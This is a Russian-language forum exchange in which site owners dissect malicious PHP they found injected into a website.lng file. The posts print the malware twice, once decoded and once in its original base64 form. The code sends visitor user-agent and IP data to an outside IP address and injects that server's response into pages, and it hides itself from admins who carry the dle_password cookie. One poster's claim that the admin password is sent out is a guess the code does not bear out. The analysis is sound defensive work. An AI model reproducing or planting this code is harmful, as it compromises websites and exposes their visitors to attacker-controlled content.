вот разшифровал код (base64)
function getnewsfromid($id) { $id = intval($id); $rtn = $id + date("j"); return $rtn; } function mysql_safe_connect($in) { if (getnewsfromid(64) < 1024) { $rtn = base64_decode($in); return $rtn; } } function get_all_news_by_list($newsid) { if (date("j") - $newsid > 320 ) { $rtn = false; } else { $get = mysql_safe_connect("http://178.211.33.74/get_api.php?pid=2&")."br=".base64_encode($_SERVER***91;'HTTP_USER_AGENT'***93;)."&ip=".base64_encode($_SERVER***91;'REMOTE_ADDR'***93;); if (!isset($_COOKIE***91;mysql_safe_connect("dle_password")***93;)) { echo @file_get_contents($get); } } }
я не эксперт в php, может dle_password это ключ для подключения к его апи, это догадки, к словам прошу не цепляться, я ничего не утверждаю кроме того что код был найден в website.lng
вот в логах я так и не нашел ничего, посмотрим на дальнейшую активность взломщика
сегодня нашел у себя на сайте такой код
function getnewsfromid($id) { $id = intval($id); $rtn = $id + date("j"); return $rtn; } function mysql_safe_connect($in) { if (getnewsfromid(64) < 1024) { $rtn = base64_decode($in); return $rtn; } } function get_all_news_by_list($newsid) { if (date("j") - $newsid > 320 ) { $rtn = false; } else { $get = mysql_safe_connect("aHR0cDovLzE3OC4yMTEuMzMuNzQvZ2V0X2FwaS5waHA/cGlkPTIm")."br=".base64_encode($_SERVER['HTTP_USER_AGENT'])."&ip=".base64_encode($_SERVER['REMOTE_ADDR']); if (!isset($_COOKIE[mysql_safe_connect("ZGxlX3Bhc3N3b3Jk")])) { echo @file_get_contents($get); } } } get_all_news_by_list (date("j"));
в файле website.lng
сейчас буду рыть логи, искать где еще нас**ли, из этого кода видно что передается пароль админа на ip 178.211.33.74, из айпи можно изьять что он закреплен за датацентром Стамбула(Турция), что по большому счету ничего пока не дает...
